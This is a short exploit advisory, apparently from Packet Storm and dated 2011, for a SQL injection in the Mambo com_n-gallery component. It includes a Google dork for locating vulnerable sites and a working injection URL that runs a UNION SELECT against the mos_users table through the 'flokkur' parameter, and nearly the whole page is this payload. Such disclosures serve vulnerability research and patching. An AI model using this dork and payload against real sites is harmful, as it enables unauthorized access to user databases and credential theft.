Mambo N-Gallery component suffers from a remote SQL injection vulnerability.
4b87cfc51082fccf43eff317fddc265b8897f570b4d482adc2a833ede281412d
------------------------------------------------------------------------------------------------------
# Exploit Title: Mambo Component com_n-gallery SQL Injection Vulnerability
# Google Dork: inurl:index.php?option=com_n-gallery
# Date: 01/09/2011
# Author: CoBRa_21 (Penetration Tester)
# E-Mail: ghost1lover@hotmail.com
# Software Link: http://www.netvistun.is/
# Tested on: FreeBSD 6.1 (remote host)
------------------------------------------------------------------------------------------------------
Exploit
http://localhost/[PATH]/index.php?option=com_n-gallery&Itemid=-0&flokkur=23 union select 0 from mos_users--
------------------------------------------------------------------------------------------------------
Thanks E-Banka.Org & Cyber-Warrior.Org
------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed